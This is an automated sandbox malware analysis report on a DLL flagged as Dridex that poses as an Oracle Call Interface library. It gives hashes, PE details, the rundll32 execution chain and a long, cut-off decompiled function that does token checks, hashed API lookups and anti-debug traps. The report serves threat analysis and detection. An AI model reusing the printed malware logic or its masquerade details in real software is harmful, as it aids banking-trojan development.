Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4698
Entropy (8bit):	4.48880346018983
Encrypted:	false
SSDEEP:	48:cvIwSD8zsLJgtWI9J/pWSC8Bw8fm8M4JCdsDChFV1y+q8/QQBY04SrSy6d:uITfliYSN3JlCEVr0DWy6d
MD5:	6BAC94B64344C795C1CD7AFDBABDDB2E
SHA1:	3A3D8B94C83ACE820EB1AFC75D0BE28F3FD9329A
SHA-256:	4F470C9CE0691D6F479DD3A6CF46C8FB1DEEC18D33609C85E254F6DDE49A8406
SHA-512:	152FB41F4BE4C0D13FE29BB01A9E90D8302C8EC399D273D1E18FF179A25808FB7A69F8DDE0A7CA3D89D62ED52420FC5F78C2FA46DC1F36222ABDAFDFABDFC7E2
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1309776" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.27863854650369
Encrypted:	false
SSDEEP:	12288:U/fGlzNTU8JqhZ65qncwOzu5W4r1cpmaCeiZLmIQrp1H2G8RwdxsLT:gfGlzNTU8JqhZ6kn
MD5:	21D7305D19FE5B8CD51D2D0684510032
SHA1:	82253896E8F485117A50B9D05180A99382EE97FF
SHA-256:	E699C3B4FE6DC32FADBDB3483270E0511577D10A928735A1DBD6FD09029B99DD
SHA-512:	FDFE1AD1A59C5D9CD62C0C8E521B64CCB18F42B92218CD10BA9FE3542C18748CED5F692449EBAE7FC7EDFAF550D17706E7746A1584E9D3BA9A958CFB9DCA0C78
Malicious:	false
Reputation:	low
Preview:	regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.,.)................................................................................................................................................................................................................................................................................................................................................#h.t........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	4.036168790025919
Encrypted:	false
SSDEEP:	384:1BAr5Rftx1wPJ4XjsFcnE7kPPBqXASeq5QMVyi6+/5l4Lk48Zd1DoXznqXvwvc:jAVRftx1GJ4XAFcE7oBqXTeq5QMVyi61
MD5:	443DE2D59B6BD26A036D75EBADD0082D
SHA1:	4D045F471E26251E784D2B42D3EA11D00C10CD45
SHA-256:	6AC20E3348C3DD0DCC0459290ADF55511CBBD7143A9A42045453386DF7027E3D
SHA-512:	F4F604B8C4475CAD3AB96577FA5FE8E25B830DE0FE72AE89DA85923EDCC365BD365E9CB1FE3FEFFB7581353F350800BDD596270D14ECA2D0FE8C753B93DD06CF
Malicious:	false
Reputation:	low
Preview:	regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.,.)................................................................................................................................................................................................................................................................................................................................................%h.tHvLE.^......Y...........~..S8.[^@B$..`.2.........0................... ..hbin................p.\..,..........nk,.H..).................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .H..)........ ........................... .......Z.......................Root........lf......Root....nk .H..).....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.322437972026823
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll
File size:	544768
MD5:	43d4b9318439f6926dfbcf46a5291621
SHA1:	06581c15c15cf8345bef1cea5b32fbc7d7d71e03
SHA256:	b06b7b05e576d19367c383aabd9c8fed8cd5e7955e2f1493d326b9b5306c7439
SHA512:	1cd1903a05030e394056ec5c23f4d08d8959ef349ffeaccbc61feb620724e4555c7e5fae7b40bedcae308681af79b9cb60f4b5d181d4e24d5ec2f547349cbe04
SSDEEP:	6144:+D+RYf/Mv1UvT4vjYf/Glpov3KvfMvLo+jwHk3UryzU3+R7ff4evm35IQku4+pMl:+Dt2UAogoOwhx7nA4+pMAg
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<..k....<...=.S.<.=.....<.......<.......<.t.?...<.t.=.4.<.L.9...<.t...0.<..k....<..0..x.<.......<..1....<..k....<

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10004db0
Entrypoint Section:	.rdata
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61C2E245 [Wed Dec 22 08:31:01 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	e980d287af7ef0ccd616c6efb9daaae8

Entrypoint Preview

Instruction
inc eax
mov edx, 00000003h
cmpps xmm1, xmm0, 02h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
jmp 00007F8458F5AFE1h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push edi
push ebx
and esp, FFFFFFF8h
sub esp, 00000090h
mov eax, dword ptr [ebp+08h]
mov byte ptr [esp+00000083h], 00000064h
mov dword ptr [esp+70h], 02263442h
mov dword ptr [esp+44h], eax
call 00007F8458F5EB6Ah
mov ecx, eax
mov edx, eax
mov esi, dword ptr [eax+3Ch]
movzx edi, word ptr [esp+0000008Ah]
mov bx, di
mov dword ptr [esp+40h], eax
mov eax, edi
xor eax, 0000E2E7h
mov word ptr [esp+3Eh], ax
mov al, byte ptr [esp+77h]
mov byte ptr [esp+3Dh], al
mov eax, dword ptr [esp+00000084h]
mov dword ptr [esp+38h], esi
mov si, word ptr [esp+3Eh]
mov word ptr [eax+eax+00000000h], si

Rich Headers

Programming Language:

[IMP] VS2015 UPD1 build 23506
[C++] VS2012 UPD1 build 51106
[ASM] VS2012 build 50727
[ASM] VS2012 UPD2 build 60315
[LNK] VS2010 SP1 build 40219
[EXP] VS2010 SP1 build 40219
[RES] VS2015 UPD1 build 23506
[IMP] VS2010 build 30319
[ASM] VS2015 UPD1 build 23506
[C++] VS2017 v15.5.4 build 25834
[EXP] VS2012 UPD4 build 61030
[C++] VS2008 build 21022
[ASM] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x7c029	0x60	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7c08c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x84000	0x2f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x85000	0x1138	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6030	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.rdata	0x1000	0x6b2e	0x7000	False	0.391496930804	data	4.47906652106	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x747db	0x75000	False	0.316222622863	data	7.44059897898	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7d000	0x6190	0x5000	False	0.24609375	data	5.03782298504	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x84000	0x2f0	0x1000	False	0.09033203125	data	0.789164600932	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x85000	0x1138	0x2000	False	0.2421875	data	4.12390144992	IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x84060	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
WINSPOOL.DRV	EnumFormsW
ADVAPI32.dll	RegCloseKey, QueryServiceStatusEx, AccessCheck
WS2_32.dll	WSACleanup
USER32.dll	GetWindowTextA
KERNEL32.dll	CloseHandle, GetModuleHandleW, GetFileSize, OutputDebugStringA, IsDebuggerPresent, GetModuleFileNameW

Version Infos

Description	Data
OriginalFilename	Iha.dll
FileDescription	Oracle Call Interface
FileVersion	2.3.7.0.0
Legal Copyright	Copyright Oracle Corporation 1979, 2001. All rights reserved.
CompanyName	Oracle Corporation
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 7096 Parent PID: 3100

General

Start time:	20:25:44
Start date:	22/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll"
Imagebase:	0x270000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 7160 Parent PID: 7096

General

Start time:	20:25:44
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3092 Parent PID: 7160

General

Start time:	20:25:45
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1
Imagebase:	0x870000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000000.302508511.000000006EB51000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000002.326161614.000000006EB51000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000000.303906353.000000006EB51000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 6364 Parent PID: 3092

General

Start time:	20:25:48
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 672
Imagebase:	0x13e0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 7096 Parent PID: 3100 loaddll32.exeCOMMON

Executed Functions

Function 6EB60730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6EB60730(void* __ecx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6eb6d1f8;
				if(_t155 == 0x4c71e88d) {
					_t155 = E6EB6361C(0x30);
					 *0x6eb6d1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6EB63698(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6EB6306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6eb6d1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6EB60FF8(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6eb6d1f8 + 0xb)) = _t162;
					_t363 = E6EB6306C(0x150c05fc, 0x1da4d409, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6eb6d1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6EB60730(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6eb6bce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6EB5F584(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6EB5F828(_t429 + 0x24, E6EB5F4CC(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6EB5F4BC(_t429 + 0x24, E6EB5F4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6EB65580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6EB5F654(_t429 + 0x20);
							E6EB655B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
							_t180 = E6EB65864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6EB5DFA4(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6EB655B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
								_t420 = E6EB65864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6EB5DFA4(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6EB655B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
								_t401 = E6EB65864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6EB5DFA4(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6EB5CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6EB65558(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6EB5CFDC(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6EB65558(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6EB5CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6EB65558(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6EB5CFDC(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6EB65558(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6EB5CFDC(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6EB65558(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6EB5CFDC(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6EB65558(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6eb6d1f8 + 0x24)) = _t189;
							_t190 = E6EB61030(0xffffffffffffffff);
							_t320 =  *0x6eb6d1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6eb6d1f8 + 0x2c)) = E6EB610A4(0x6eb6d1f8, 0xffffffffffffffff);
								L78:
								if(E6EB6306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6eb6d1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6EB6306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6eb6d1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6EB635F0(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6EB6306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6EB635F0(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6EB5F584(_t429 + 0x18c, _t206);
								_t411 = E6EB6306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6EB5F654(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6EB5F4BC(_t429 + 0x18c, 0);
								_t213 = E6EB5F4CC(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6EB635F0(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6EB5F4BC(_t429 + 0x18c, 0);
								E6EB5DF4C(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6EB6306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6EB5DFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6EB6306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6EB5E06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6EB64FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6EB5E8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6EB5DFA4(_t429 + 0x1b8);
								E6EB5DFA4(_t429 + 0x1b0);
								E6EB5F654(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6EB5BB44(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6eb6d1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6EB5BB44(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6EB635F0(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6EB6306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6EB635F0(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
					if( *(_t429 + 0x1a0) != 0) {
						E6EB5F584(_t429 + 0x3c, _t262);
						_t265 = E6EB6306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6EB5F654(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6EB5F4BC(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6EB5F4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6EB635F0(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6EB5F4BC(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6EB6306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6EB635F0(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
